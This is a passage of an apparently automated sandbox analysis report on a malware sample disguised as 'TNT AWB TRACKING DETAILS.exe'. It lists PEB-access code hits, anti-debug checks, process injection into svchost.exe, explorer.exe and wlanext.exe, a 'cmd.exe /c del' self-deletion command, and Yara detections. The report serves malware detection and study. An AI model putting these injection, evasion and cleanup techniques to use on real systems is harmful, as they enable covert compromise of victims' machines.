          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
          Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4_2_00700063 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4_2_006FFD20 SetUnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3504
          Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3504
          Source: C:\Windows\SysWOW64\svchost.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 6F0000
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 86E008
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00436CD7 LogonUserW
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: explorer.exe, 00000003.00000000.1454817107.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3837282148.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
          Source: TNT AWB TRACKING DETAILS.exe, explorer.exe, 00000003.00000000.1454817107.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.2292994901.00000000087E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.1454817107.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3837282148.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1454817107.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3837282148.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: TNT AWB TRACKING DETAILS.exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000000.1454559665.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3832268216.0000000000A44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanq
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_00472C3F GetUserNameW
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

          Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: TNT AWB TRACKING DETAILS.exe | Binary or memory string: WIN_XP
